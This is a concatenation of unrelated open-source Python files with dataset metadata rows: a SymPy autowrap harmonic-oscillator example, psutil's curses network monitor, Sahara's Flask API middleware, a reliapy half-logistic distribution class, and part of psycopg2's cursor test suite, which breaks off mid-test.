# To calculate the integral with autowrap, we notice that it contains an
# element-wise sum over all vectors. Using the Indexed class, it is
# possible to generate autowrapped functions that perform summations in
# the low-level code. (In fact, summations are very easy to create, and as
# we will see it is often necessary to take extra steps in order to avoid
# them.)
# we need one integration ufunc for each wave function in the h.o. basis
binary_integrator = {}
for n in range(basis_dimension):
#
# setup basis wave functions
#
# To get inline expressions in the low level code, we attach the
# wave function expressions to a regular Sympy function using the
# implemented_function utility. This is an extra step needed to avoid
# erronous summations in the wave function expressions.
#
# Such function objects carry around the expression they represent,
# but the expression is not exposed unless explicit measures are taken.
# The benefit is that the routines that searches for repeated indices
# in order to make contractions will not search through the wave
# function expression.
psi_ho = implemented_function('psi_ho',
Lambda(x, R_nl(n, orbital_momentum_l, omega2, x)))
# We represent the hydrogen function by an array which will be an input
# argument to the binary routine. This will let the integrators find
# h.o. basis coefficients for any wave function we throw at them.
psi = IndexedBase('psi')
#
# setup expression for the integration
#
step = Symbol('step') # use symbolic stepsize for flexibility
# let i represent an index of the grid array, and let A represent the
# grid array. Then we can approximate the integral by a sum over the
# following expression (simplified rectangular rule, ignoring end point
# corrections):
expr = A[i]**2*psi_ho(A[i])*psi[i]*step
if n==0:
print "Setting up binary integrators for the integral:"
pprint(Integral(x**2*psi_ho(x)*Function('psi')(x), (x, 0, oo)))
# But it needs to be an operation on indexed objects, so that the code
# generators will recognize it correctly as an array.
# expr = expr.subs(x, A[i])
# Autowrap it. For functions that take more than one argument, it is
# a good idea to use the 'args' keyword so that you know the signature
# of the wrapped function. (The dimension m will be an optional
# argument, but it must be present in the args list.)
binary_integrator[n] = autowrap(expr, args=[A.label, psi.label, step, m])
# Lets see how it converges with the grid dimension
print "Checking convergence of integrator for n = %i" %n
for g in range(3, 8):
grid, step = np.linspace(0, rmax, 2**g, retstep=True)
print "grid dimension %5i, integral = %e" % (2**g,
binary_integrator[n](grid, H_ufunc(grid), step))
print "A binary integrator has been set up for each basis state"
print "We will now use them to reconstruct a hydrogen solution."
# Note: We didn't need to specify grid or use gridsize before now
grid, stepsize = np.linspace(0, rmax, gridsize, retstep=True)
print "Calculating coefficients with gridsize = %i and stepsize %f" %(
len(grid), stepsize)
coeffs = {}
for n in range(basis_dimension):
coeffs[n] = binary_integrator[n](grid, H_ufunc(grid), stepsize)
print "c(%i) = %e" % (n, coeffs[n])
print "Constructing the approximate hydrogen wave"
hydro_approx = 0
all_steps = {}
for n in range(basis_dimension):
hydro_approx += basis_ho[n](grid)*coeffs[n]
all_steps[n] = hydro_approx.copy()
if pylab:
line = pylab.plot(grid, all_steps[n], ':', label='max n = %i'%n)
# check error numerically
diff = np.max(np.abs(hydro_approx - H_ufunc(grid)))
print "Error estimate: the element with largest deviation misses by %f" % diff
if diff > 0.01:
print "This is much, try to increase the basis size or adjust omega"
else:
print "Ah, that's a pretty good approximation!"
# Check visually
if pylab:
print "Here's a plot showing the contribution for each n"
line[0].set_linestyle('-')
pylab.plot(grid, H_ufunc(grid), 'r-', label='exact')
pylab.legend()
pylab.show()
print """Note:
These binary integrators were specialized to find coefficients for a
harmonic oscillator basis, but they can process any wave function as long
as it is available as a vector and defined on a grid with equidistant
points. That is, on any grid you get from numpy.linspace.
To make the integrators even more flexible, you can setup the harmonic
oscillator solutions with symbolic parameters omega and l. Then the
autowrapped binary routine will take these scalar variables as arguments,
so that the integrators can find coefficients for *any* isotropic harmonic
oscillator basis.
"""
if __name__ == '__main__':
main()
| 38.295359 | 82 | 0.649405 |
acfa6500668b24729fb2a0fbf76d12ddb3627026 | 4,711 | py | Python | scripts/nettop.py | Mezantrop74/psutil-andoid | 978b673c48dc0422ea3ee3267a13b0e24e88e07a | [
"BSD-3-Clause"
] | null | null | null | scripts/nettop.py | Mezantrop74/psutil-andoid | 978b673c48dc0422ea3ee3267a13b0e24e88e07a | [
"BSD-3-Clause"
] | null | null | null | scripts/nettop.py | Mezantrop74/psutil-andoid | 978b673c48dc0422ea3ee3267a13b0e24e88e07a | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
#
# $Id: iotop.py 1160 2011-10-14 18:50:36Z g.rodola@gmail.com $
#
# Copyright (c) 2009, Giampaolo Rodola'. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Shows real-time network statistics.
Author: Giampaolo Rodola' <g.rodola@gmail.com>
$ python scripts/nettop.py
-----------------------------------------------------------
total bytes: sent: 1.49 G received: 4.82 G
total packets: sent: 7338724 received: 8082712
wlan0 TOTAL PER-SEC
-----------------------------------------------------------
bytes-sent 1.29 G 0.00 B/s
bytes-recv 3.48 G 0.00 B/s
pkts-sent 7221782 0
pkts-recv 6753724 0
eth1 TOTAL PER-SEC
-----------------------------------------------------------
bytes-sent 131.77 M 0.00 B/s
bytes-recv 1.28 G 0.00 B/s
pkts-sent 0 0
pkts-recv 1214470 0
"""
import atexit
import time
import sys
try:
import curses
except ImportError:
sys.exit('platform not supported')
import psutil
# --- curses stuff
def tear_down():
    """Restore the terminal to its normal state (registered via atexit)."""
    win.keypad(0)
    curses.nocbreak()
    curses.echo()
    curses.endwin()
win = curses.initscr()
atexit.register(tear_down)
curses.endwin()
lineno = 0
def print_line(line, highlight=False):
    """A thin wrapper around curses's addstr().

    Writes *line* at the current row (module-global ``lineno``) and
    advances the row counter; highlighted lines are drawn in reverse video.
    """
    global lineno
    try:
        if highlight:
            # pad to the window width so the reverse-video bar spans the row
            line += " " * (win.getmaxyx()[1] - len(line))
            win.addstr(lineno, 0, line, curses.A_REVERSE)
        else:
            win.addstr(lineno, 0, line, 0)
    except curses.error:
        # writing past the bottom raises curses.error: restart from the
        # top, refresh what we have, and let the caller see the error
        lineno = 0
        win.refresh()
        raise
    else:
        lineno += 1
# --- curses stuff
def bytes2human(n):
    """Convert a byte count to a human readable string (binary prefixes).

    Uses 1 K = 1024 bytes and a fixed two-decimal format; values below
    1024 are reported in plain bytes.

    >>> bytes2human(10000)
    '9.77 K'
    >>> bytes2human(100001221)
    '95.37 M'
    """
    # NOTE: the doctest examples previously claimed '9.8 K' / '95.4 M',
    # which does not match the '%.2f' format actually used below.
    symbols = ('K', 'M', 'G', 'T', 'P', 'E', 'Z', 'Y')
    prefix = {}
    for i, s in enumerate(symbols):
        # K = 2**10, M = 2**20, ...
        prefix[s] = 1 << (i + 1) * 10
    for s in reversed(symbols):
        if n >= prefix[s]:
            value = float(n) / prefix[s]
            return '%.2f %s' % (value, s)
    return '%.2f B' % (n)
def poll(interval):
    """Retrieve raw stats within an interval window.

    Samples system-wide and per-NIC I/O counters *interval* seconds apart
    and returns (tot_before, tot_after, pnic_before, pnic_after).
    """
    tot_before = psutil.net_io_counters()
    pnic_before = psutil.net_io_counters(pernic=True)
    # sleep some time
    time.sleep(interval)
    tot_after = psutil.net_io_counters()
    pnic_after = psutil.net_io_counters(pernic=True)
    return (tot_before, tot_after, pnic_before, pnic_after)
def refresh_window(tot_before, tot_after, pnic_before, pnic_after):
    """Print stats on screen: system totals, then a per-NIC table with
    cumulative counters and the per-second delta of the last window."""
    global lineno
    # totals
    print_line("total bytes: sent: %-10s received: %s" % (
        bytes2human(tot_after.bytes_sent),
        bytes2human(tot_after.bytes_recv))
    )
    print_line("total packets: sent: %-10s received: %s" % (
        tot_after.packets_sent, tot_after.packets_recv))
    # per-network interface details: let's sort network interfaces so
    # that the ones which generated more traffic are shown first
    print_line("")
    nic_names = list(pnic_after.keys())
    nic_names.sort(key=lambda x: sum(pnic_after[x]), reverse=True)
    for name in nic_names:
        stats_before = pnic_before[name]
        stats_after = pnic_after[name]
        templ = "%-15s %15s %15s"
        print_line(templ % (name, "TOTAL", "PER-SEC"), highlight=True)
        # before/after deltas give the rate over the last poll window
        print_line(templ % (
            "bytes-sent",
            bytes2human(stats_after.bytes_sent),
            bytes2human(
                stats_after.bytes_sent - stats_before.bytes_sent) + '/s',
        ))
        print_line(templ % (
            "bytes-recv",
            bytes2human(stats_after.bytes_recv),
            bytes2human(
                stats_after.bytes_recv - stats_before.bytes_recv) + '/s',
        ))
        print_line(templ % (
            "pkts-sent",
            stats_after.packets_sent,
            stats_after.packets_sent - stats_before.packets_sent,
        ))
        print_line(templ % (
            "pkts-recv",
            stats_after.packets_recv,
            stats_after.packets_recv - stats_before.packets_recv,
        ))
        print_line("")
    win.refresh()
    # start again from the top row on the next refresh
    lineno = 0
def main():
    """Poll and redraw in a loop until the user interrupts."""
    interval = 0
    try:
        while True:
            stats = poll(interval)
            refresh_window(*stats)
            # The first draw happens immediately; later ones wait a second.
            interval = 1
    except (KeyboardInterrupt, SystemExit):
        pass
# Script entry point: run the network-stats loop until interrupted.
if __name__ == '__main__':
    main()
| 28.379518 | 73 | 0.545319 |
acfa651ded1286d65c37a9ddabae0ae0ae6832f3 | 2,765 | py | Python | sahara/api/middleware/sahara_middleware.py | ngohoa211/sahara | 0ba85a2247476d5f484bc626c0dc3cc0ba3cc986 | [
"Apache-2.0"
] | null | null | null | sahara/api/middleware/sahara_middleware.py | ngohoa211/sahara | 0ba85a2247476d5f484bc626c0dc3cc0ba3cc986 | [
"Apache-2.0"
] | null | null | null | sahara/api/middleware/sahara_middleware.py | ngohoa211/sahara | 0ba85a2247476d5f484bc626c0dc3cc0ba3cc986 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2015 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import flask
from oslo_config import cfg
import six
from werkzeug import exceptions as werkzeug_exceptions
from sahara.api import v10 as api_v10
from sahara.api import v11 as api_v11
from sahara.api import v2 as api_v2
from sahara import context
from sahara.utils import api as api_utils
# Global oslo.config handle shared by the app builders below.
CONF = cfg.CONF
def build_app():
    """App builder (wsgi).

    Entry point for Sahara REST API server
    """
    app = flask.Flask('sahara.api')

    @app.teardown_request
    def teardown_request(_ex=None):
        # Drop the per-request context once the request is finished.
        context.set_ctx(None)

    # Mount the v1 APIs; the v1.0 blueprint also answers under /v1.1.
    for blueprint, prefix in ((api_v10.rest, '/v1.0'),
                              (api_v10.rest, '/v1.1'),
                              (api_v11.rest, '/v1.1')):
        app.register_blueprint(blueprint, url_prefix=prefix)

    class _JSONErrorHandler(dict):
        # Dict-like handler that renders any exception as a JSON error body.
        def __getitem__(self, ex):
            if isinstance(ex, werkzeug_exceptions.HTTPException):
                status_code = ex.code
                description = ex.description
            else:
                status_code = 500
                description = str(ex)
            return api_utils.render({'error': status_code,
                                     'error_message': description},
                                    status=status_code)

    make_json_error = _JSONErrorHandler()
    # Register the JSON handler for every standard HTTP error code.
    for status in werkzeug_exceptions.default_exceptions:
        app.register_error_handler(status, make_json_error)

    return app
def build_v2_app():
    """App builder (wsgi).

    Entry point for Experimental V2 Sahara REST API server
    """
    # Start from the stable v1 app and layer the experimental v2 API on top.
    base_app = build_app()
    api_v2.register_blueprints(base_app, url_prefix='/v2')
    return base_app
class Router(object):
    """WSGI entry point (paste factory) for the v1 Sahara API."""

    @classmethod
    def factory(cls, global_config, **local_config):
        # Build the flask app once and share it as a class attribute.
        cls.app = build_app()
        return cls(**local_config)

    def __call__(self, environ, response):
        return self.app(environ, response)
class RouterV2(object):
    """WSGI entry point (paste factory) for the experimental v2 API."""

    @classmethod
    def factory(cls, global_config, **local_config):
        # Build the flask app once and share it as a class attribute.
        cls.app = build_v2_app()
        return cls(**local_config)

    def __call__(self, environ, response):
        return self.app(environ, response)
| 28.802083 | 79 | 0.668354 |
acfa66450de5ae051982d1868ac1bc42b68ae4f9 | 1,730 | py | Python | src/reliapy/distributions/continuous/_halflogistic.py | reliapy/reliapy | 3efd48af5cc3bedbcbc5de64fb43e6c5625e3f6d | [
"BSD-3-Clause"
] | null | null | null | src/reliapy/distributions/continuous/_halflogistic.py | reliapy/reliapy | 3efd48af5cc3bedbcbc5de64fb43e6c5625e3f6d | [
"BSD-3-Clause"
] | null | null | null | src/reliapy/distributions/continuous/_halflogistic.py | reliapy/reliapy | 3efd48af5cc3bedbcbc5de64fb43e6c5625e3f6d | [
"BSD-3-Clause"
] | null | null | null | from reliapy.distributions.continuous import _Continuous
from scipy.stats import halflogistic as prob
class HalfLogistic(_Continuous):
    """Half-logistic continuous distribution.

    Thin wrapper around ``scipy.stats.halflogistic`` bound to a fixed
    location/scale pair.
    """

    def __init__(self, loc=None, scale=None, random_state=None):
        self.loc = loc
        self.scale = scale
        # Pre-compute mean and variance for the chosen parameters.
        self.stats = prob.stats(moments='mv', **self._shape())
        self.random_state = random_state
        super().__init__()

    def _shape(self):
        """Return the location/scale keywords shared by all scipy calls."""
        return {'loc': self.loc, 'scale': self.scale}

    def pdf(self, X=None):
        """
        PDF.
        **Input:**
        * **X** (`float`)
            Argument.
        **Output**
            PDF of X.
        """
        return prob.pdf(X, **self._shape())

    def cdf(self, X=None):
        """
        CDF.
        **Input:**
        * **X** (`float`)
            Argument.
        **Output**
            CDF of X.
        """
        return prob.cdf(X, **self._shape())

    def icdf(self, y=None):
        """
        Inverse CDF.
        **Input:**
        * **y** (`float`)
            Probability in [0, 1].
        **Output**
            Inverse CDF of y.
        """
        return prob.ppf(y, **self._shape())

    def moment(self, n=1):
        """
        Get the non-central moments of order n.
        **Input:**
        * **n** (`float`)
            Order of the moment.
        **Output**
            non central moment.
        """
        return prob.moment(n, **self._shape())

    def rvs(self, n_sim=1):
        """
        Get `n_sim` random samples.
        **Input:**
        * **n_sim** (`float`)
            Number of random samples.
        **Output**
            Samples.
        """
        return prob.rvs(size=n_sim, random_state=self.random_state,
                        **self._shape())
| 21.898734 | 99 | 0.492486 |
acfa6665b5fcb51a710928f108c8dcae0d85b21f | 24,063 | py | Python | virtual/lib/python2.7/site-packages/psycopg2/tests/test_cursor.py | UMULISA12/ProjPost_Ip | 6bd51e4f49cb310a978f0cf0b1214a6209c295a2 | [
"MIT"
] | null | null | null | virtual/lib/python2.7/site-packages/psycopg2/tests/test_cursor.py | UMULISA12/ProjPost_Ip | 6bd51e4f49cb310a978f0cf0b1214a6209c295a2 | [
"MIT"
] | 10 | 2019-12-26T17:31:31.000Z | 2022-03-21T22:17:33.000Z | virtual/lib/python2.7/site-packages/psycopg2/tests/test_cursor.py | UMULISA12/ProjPost_Ip | 6bd51e4f49cb310a978f0cf0b1214a6209c295a2 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# test_cursor.py - unit test for cursor attributes
#
# Copyright (C) 2010-2011 Daniele Varrazzo <daniele.varrazzo@gmail.com>
#
# psycopg2 is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# In addition, as a special exception, the copyright holders give
# permission to link this program with the OpenSSL library (or with
# modified versions of OpenSSL that use the same license as OpenSSL),
# and distribute linked combinations including the two.
#
# You must obey the GNU Lesser General Public License in all respects for
# all of the code used other than OpenSSL.
#
# psycopg2 is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public
# License for more details.
import time
import pickle
import psycopg2
import psycopg2.extensions
from testutils import (unittest, ConnectingTestCase, skip_before_postgres,
skip_if_no_namedtuple, skip_if_no_getrefcount, slow, skip_if_no_superuser,
skip_if_windows)
import psycopg2.extras
class CursorTests(ConnectingTestCase):
    """Unit tests for psycopg2 cursor behaviour.

    Covers regular and named (server-side) cursors: mogrify, casting,
    WITH HOLD, scrolling, iteration page size, callproc, and regression
    tests for specific issues. Requires a live PostgreSQL connection
    provided by ConnectingTestCase.
    """
    def test_close_idempotent(self):
        cur = self.conn.cursor()
        cur.close()
        cur.close()
        self.assert_(cur.closed)
    def test_empty_query(self):
        cur = self.conn.cursor()
        self.assertRaises(psycopg2.ProgrammingError, cur.execute, "")
        self.assertRaises(psycopg2.ProgrammingError, cur.execute, " ")
        self.assertRaises(psycopg2.ProgrammingError, cur.execute, ";")
    def test_executemany_propagate_exceptions(self):
        conn = self.conn
        cur = conn.cursor()
        cur.execute("create temp table test_exc (data int);")
        def buggygen():
            # Raises ZeroDivisionError on first iteration.
            yield 1 // 0
        self.assertRaises(ZeroDivisionError,
            cur.executemany, "insert into test_exc values (%s)", buggygen())
        cur.close()
    def test_mogrify_unicode(self):
        conn = self.conn
        cur = conn.cursor()
        # test consistency between execute and mogrify.
        # unicode query containing only ascii data
        cur.execute(u"SELECT 'foo';")
        self.assertEqual('foo', cur.fetchone()[0])
        self.assertEqual(b"SELECT 'foo';", cur.mogrify(u"SELECT 'foo';"))
        conn.set_client_encoding('UTF8')
        snowman = u"\u2603"
        def b(s):
            # Normalize to bytes for comparison (py2 unicode vs str).
            if isinstance(s, unicode):
                return s.encode('utf8')
            else:
                return s
        # unicode query with non-ascii data
        cur.execute(u"SELECT '%s';" % snowman)
        self.assertEqual(snowman.encode('utf8'), b(cur.fetchone()[0]))
        self.assertQuotedEqual(("SELECT '%s';" % snowman).encode('utf8'),
            cur.mogrify(u"SELECT '%s';" % snowman))
        # unicode args
        cur.execute("SELECT %s;", (snowman,))
        self.assertEqual(snowman.encode("utf-8"), b(cur.fetchone()[0]))
        self.assertQuotedEqual(("SELECT '%s';" % snowman).encode('utf8'),
            cur.mogrify("SELECT %s;", (snowman,)))
        # unicode query and args
        cur.execute(u"SELECT %s;", (snowman,))
        self.assertEqual(snowman.encode("utf-8"), b(cur.fetchone()[0]))
        self.assertQuotedEqual(("SELECT '%s';" % snowman).encode('utf8'),
            cur.mogrify(u"SELECT %s;", (snowman,)))
    def test_mogrify_decimal_explodes(self):
        # issue #7: explodes on windows with python 2.5 and psycopg 2.2.2
        try:
            from decimal import Decimal
        except:
            return
        conn = self.conn
        cur = conn.cursor()
        self.assertEqual(b'SELECT 10.3;',
            cur.mogrify("SELECT %s;", (Decimal("10.3"),)))
    @skip_if_no_getrefcount
    def test_mogrify_leak_on_multiple_reference(self):
        # issue #81: reference leak when a parameter value is referenced
        # more than once from a dict.
        cur = self.conn.cursor()
        foo = (lambda x: x)('foo') * 10
        import sys
        nref1 = sys.getrefcount(foo)
        cur.mogrify("select %(foo)s, %(foo)s, %(foo)s", {'foo': foo})
        nref2 = sys.getrefcount(foo)
        self.assertEqual(nref1, nref2)
    def test_modify_closed(self):
        # mogrify still works on a closed cursor (no server round-trip).
        cur = self.conn.cursor()
        cur.close()
        sql = cur.mogrify("select %s", (10,))
        self.assertEqual(sql, b"select 10")
    def test_bad_placeholder(self):
        cur = self.conn.cursor()
        self.assertRaises(psycopg2.ProgrammingError,
            cur.mogrify, "select %(foo", {})
        self.assertRaises(psycopg2.ProgrammingError,
            cur.mogrify, "select %(foo", {'foo': 1})
        self.assertRaises(psycopg2.ProgrammingError,
            cur.mogrify, "select %(foo, %(bar)", {'foo': 1})
        self.assertRaises(psycopg2.ProgrammingError,
            cur.mogrify, "select %(foo, %(bar)", {'foo': 1, 'bar': 2})
    def test_cast(self):
        curs = self.conn.cursor()
        self.assertEqual(42, curs.cast(20, '42'))
        self.assertAlmostEqual(3.14, curs.cast(700, '3.14'))
        try:
            from decimal import Decimal
        except ImportError:
            self.assertAlmostEqual(123.45, curs.cast(1700, '123.45'))
        else:
            self.assertEqual(Decimal('123.45'), curs.cast(1700, '123.45'))
        from datetime import date
        self.assertEqual(date(2011, 1, 2), curs.cast(1082, '2011-01-02'))
        self.assertEqual("who am i?", curs.cast(705, 'who am i?'))  # unknown
    def test_cast_specificity(self):
        # Typecasters registered on a cursor take precedence over the
        # connection-level ones.
        curs = self.conn.cursor()
        self.assertEqual("foo", curs.cast(705, 'foo'))
        D = psycopg2.extensions.new_type((705,), "DOUBLING", lambda v, c: v * 2)
        psycopg2.extensions.register_type(D, self.conn)
        self.assertEqual("foofoo", curs.cast(705, 'foo'))
        T = psycopg2.extensions.new_type((705,), "TREBLING", lambda v, c: v * 3)
        psycopg2.extensions.register_type(T, curs)
        self.assertEqual("foofoofoo", curs.cast(705, 'foo'))
        curs2 = self.conn.cursor()
        self.assertEqual("foofoo", curs2.cast(705, 'foo'))
    def test_weakref(self):
        from weakref import ref
        curs = self.conn.cursor()
        w = ref(curs)
        del curs
        import gc
        gc.collect()
        self.assert_(w() is None)
    def test_null_name(self):
        curs = self.conn.cursor(None)
        self.assertEqual(curs.name, None)
    def test_invalid_name(self):
        # A named cursor name is quoted, so odd characters are legal.
        curs = self.conn.cursor()
        curs.execute("create temp table invname (data int);")
        for i in (10, 20, 30):
            curs.execute("insert into invname values (%s)", (i,))
        curs.close()
        curs = self.conn.cursor(r'1-2-3 \ "test"')
        curs.execute("select data from invname order by data")
        self.assertEqual(curs.fetchall(), [(10,), (20,), (30,)])
    def _create_withhold_table(self):
        # Helper: (re)create the "withhold" table with rows 10, 20, 30.
        curs = self.conn.cursor()
        try:
            curs.execute("drop table withhold")
        except psycopg2.ProgrammingError:
            self.conn.rollback()
        curs.execute("create table withhold (data int)")
        for i in (10, 20, 30):
            curs.execute("insert into withhold values (%s)", (i,))
        curs.close()
    def test_withhold(self):
        # WITH HOLD cursors survive a commit; the flag requires a name.
        self.assertRaises(psycopg2.ProgrammingError, self.conn.cursor,
            withhold=True)
        self._create_withhold_table()
        curs = self.conn.cursor("W")
        self.assertEqual(curs.withhold, False)
        curs.withhold = True
        self.assertEqual(curs.withhold, True)
        curs.execute("select data from withhold order by data")
        self.conn.commit()
        self.assertEqual(curs.fetchall(), [(10,), (20,), (30,)])
        curs.close()
        curs = self.conn.cursor("W", withhold=True)
        self.assertEqual(curs.withhold, True)
        curs.execute("select data from withhold order by data")
        self.conn.commit()
        self.assertEqual(curs.fetchall(), [(10,), (20,), (30,)])
        curs = self.conn.cursor()
        curs.execute("drop table withhold")
        self.conn.commit()
    def test_withhold_no_begin(self):
        self._create_withhold_table()
        curs = self.conn.cursor("w", withhold=True)
        curs.execute("select data from withhold order by data")
        self.assertEqual(curs.fetchone(), (10,))
        self.assertEqual(self.conn.status, psycopg2.extensions.STATUS_BEGIN)
        self.assertEqual(self.conn.get_transaction_status(),
            psycopg2.extensions.TRANSACTION_STATUS_INTRANS)
        self.conn.commit()
        self.assertEqual(self.conn.status, psycopg2.extensions.STATUS_READY)
        self.assertEqual(self.conn.get_transaction_status(),
            psycopg2.extensions.TRANSACTION_STATUS_IDLE)
        self.assertEqual(curs.fetchone(), (20,))
        self.assertEqual(self.conn.status, psycopg2.extensions.STATUS_READY)
        self.assertEqual(self.conn.get_transaction_status(),
            psycopg2.extensions.TRANSACTION_STATUS_IDLE)
        curs.close()
        self.assertEqual(self.conn.status, psycopg2.extensions.STATUS_READY)
        self.assertEqual(self.conn.get_transaction_status(),
            psycopg2.extensions.TRANSACTION_STATUS_IDLE)
    def test_withhold_autocommit(self):
        self._create_withhold_table()
        self.conn.commit()
        self.conn.autocommit = True
        curs = self.conn.cursor("w", withhold=True)
        curs.execute("select data from withhold order by data")
        self.assertEqual(curs.fetchone(), (10,))
        self.assertEqual(self.conn.status, psycopg2.extensions.STATUS_READY)
        self.assertEqual(self.conn.get_transaction_status(),
            psycopg2.extensions.TRANSACTION_STATUS_IDLE)
        self.conn.commit()
        self.assertEqual(self.conn.status, psycopg2.extensions.STATUS_READY)
        self.assertEqual(self.conn.get_transaction_status(),
            psycopg2.extensions.TRANSACTION_STATUS_IDLE)
        curs.close()
        self.assertEqual(self.conn.status, psycopg2.extensions.STATUS_READY)
        self.assertEqual(self.conn.get_transaction_status(),
            psycopg2.extensions.TRANSACTION_STATUS_IDLE)
    def test_scrollable(self):
        # The scrollable flag requires a named cursor.
        self.assertRaises(psycopg2.ProgrammingError, self.conn.cursor,
            scrollable=True)
        curs = self.conn.cursor()
        curs.execute("create table scrollable (data int)")
        curs.executemany("insert into scrollable values (%s)",
            [(i,) for i in range(100)])
        curs.close()
        for t in range(2):
            if not t:
                curs = self.conn.cursor("S")
                self.assertEqual(curs.scrollable, None)
                curs.scrollable = True
            else:
                curs = self.conn.cursor("S", scrollable=True)
            self.assertEqual(curs.scrollable, True)
            curs.itersize = 10
            # complex enough to make postgres cursors declare without
            # scroll/no scroll to fail
            curs.execute("""
                select x.data
                from scrollable x
                join scrollable y on x.data = y.data
                order by y.data""")
            for i, (n,) in enumerate(curs):
                self.assertEqual(i, n)
            curs.scroll(-1)
            for i in range(99, -1, -1):
                curs.scroll(-1)
                self.assertEqual(i, curs.fetchone()[0])
                curs.scroll(-1)
            curs.close()
    def test_not_scrollable(self):
        self.assertRaises(psycopg2.ProgrammingError, self.conn.cursor,
            scrollable=False)
        curs = self.conn.cursor()
        curs.execute("create table scrollable (data int)")
        curs.executemany("insert into scrollable values (%s)",
            [(i,) for i in range(100)])
        curs.close()
        curs = self.conn.cursor("S")  # default scrollability
        curs.execute("select * from scrollable")
        self.assertEqual(curs.scrollable, None)
        curs.scroll(2)
        try:
            curs.scroll(-1)
        except psycopg2.OperationalError:
            return self.skipTest("can't evaluate non-scrollable cursor")
        curs.close()
        curs = self.conn.cursor("S", scrollable=False)
        self.assertEqual(curs.scrollable, False)
        curs.execute("select * from scrollable")
        curs.scroll(2)
        self.assertRaises(psycopg2.OperationalError, curs.scroll, -1)
    @slow
    @skip_before_postgres(8, 2)
    def test_iter_named_cursor_efficient(self):
        curs = self.conn.cursor('tmp')
        # if these records are fetched in the same roundtrip their
        # timestamp will not be influenced by the pause in Python world.
        curs.execute("""select clock_timestamp() from generate_series(1,2)""")
        i = iter(curs)
        t1 = (i.next())[0]  # the brackets work around a 2to3 bug
        time.sleep(0.2)
        t2 = (i.next())[0]
        self.assert_((t2 - t1).microseconds * 1e-6 < 0.1,
            "named cursor records fetched in 2 roundtrips (delta: %s)"
            % (t2 - t1))
    @skip_before_postgres(8, 0)
    def test_iter_named_cursor_default_itersize(self):
        curs = self.conn.cursor('tmp')
        curs.execute('select generate_series(1,50)')
        rv = [(r[0], curs.rownumber) for r in curs]
        # everything swallowed in one gulp
        self.assertEqual(rv, [(i, i) for i in range(1, 51)])
    @skip_before_postgres(8, 0)
    def test_iter_named_cursor_itersize(self):
        curs = self.conn.cursor('tmp')
        curs.itersize = 30
        curs.execute('select generate_series(1,50)')
        rv = [(r[0], curs.rownumber) for r in curs]
        # everything swallowed in two gulps
        self.assertEqual(rv, [(i, ((i - 1) % 30) + 1) for i in range(1, 51)])
    @skip_before_postgres(8, 0)
    def test_iter_named_cursor_rownumber(self):
        curs = self.conn.cursor('tmp')
        # note: this fails if itersize < dataset: internally we check
        # rownumber == rowcount to detect when to read another page, so we
        # would need an extra attribute to have a monotonic rownumber.
        curs.itersize = 20
        curs.execute('select generate_series(1,10)')
        for i, rec in enumerate(curs):
            self.assertEqual(i + 1, curs.rownumber)
    @skip_if_no_namedtuple
    def test_namedtuple_description(self):
        curs = self.conn.cursor()
        curs.execute("""select
            3.14::decimal(10,2) as pi,
            'hello'::text as hi,
            '2010-02-18'::date as now;
            """)
        self.assertEqual(len(curs.description), 3)
        for c in curs.description:
            self.assertEqual(len(c), 7)  # DBAPI happy
            for a in ('name', 'type_code', 'display_size', 'internal_size',
                    'precision', 'scale', 'null_ok'):
                self.assert_(hasattr(c, a), a)
        c = curs.description[0]
        self.assertEqual(c.name, 'pi')
        self.assert_(c.type_code in psycopg2.extensions.DECIMAL.values)
        self.assert_(c.internal_size > 0)
        self.assertEqual(c.precision, 10)
        self.assertEqual(c.scale, 2)
        c = curs.description[1]
        self.assertEqual(c.name, 'hi')
        self.assert_(c.type_code in psycopg2.STRING.values)
        self.assert_(c.internal_size < 0)
        self.assertEqual(c.precision, None)
        self.assertEqual(c.scale, None)
        c = curs.description[2]
        self.assertEqual(c.name, 'now')
        self.assert_(c.type_code in psycopg2.extensions.DATE.values)
        self.assert_(c.internal_size > 0)
        self.assertEqual(c.precision, None)
        self.assertEqual(c.scale, None)
    def test_pickle_description(self):
        curs = self.conn.cursor()
        curs.execute('SELECT 1 AS foo')
        description = curs.description
        pickled = pickle.dumps(description, pickle.HIGHEST_PROTOCOL)
        unpickled = pickle.loads(pickled)
        self.assertEqual(description, unpickled)
    @skip_before_postgres(8, 0)
    def test_named_cursor_stealing(self):
        # you can use a named cursor to iterate on a refcursor created
        # somewhere else
        cur1 = self.conn.cursor()
        cur1.execute("DECLARE test CURSOR WITHOUT HOLD "
            " FOR SELECT generate_series(1,7)")
        cur2 = self.conn.cursor('test')
        # can call fetch without execute
        self.assertEqual((1,), cur2.fetchone())
        self.assertEqual([(2,), (3,), (4,)], cur2.fetchmany(3))
        self.assertEqual([(5,), (6,), (7,)], cur2.fetchall())
    @skip_before_postgres(8, 2)
    def test_named_noop_close(self):
        # closing a never-executed named cursor must not fail.
        cur = self.conn.cursor('test')
        cur.close()
    @skip_before_postgres(8, 2)
    def test_stolen_named_cursor_close(self):
        cur1 = self.conn.cursor()
        cur1.execute("DECLARE test CURSOR WITHOUT HOLD "
            " FOR SELECT generate_series(1,7)")
        cur2 = self.conn.cursor('test')
        cur2.close()
        cur1.execute("DECLARE test CURSOR WITHOUT HOLD "
            " FOR SELECT generate_series(1,7)")
        cur2 = self.conn.cursor('test')
        cur2.close()
    @skip_before_postgres(8, 0)
    def test_scroll(self):
        cur = self.conn.cursor()
        cur.execute("select generate_series(0,9)")
        cur.scroll(2)
        self.assertEqual(cur.fetchone(), (2,))
        cur.scroll(2)
        self.assertEqual(cur.fetchone(), (5,))
        cur.scroll(2, mode='relative')
        self.assertEqual(cur.fetchone(), (8,))
        cur.scroll(-1)
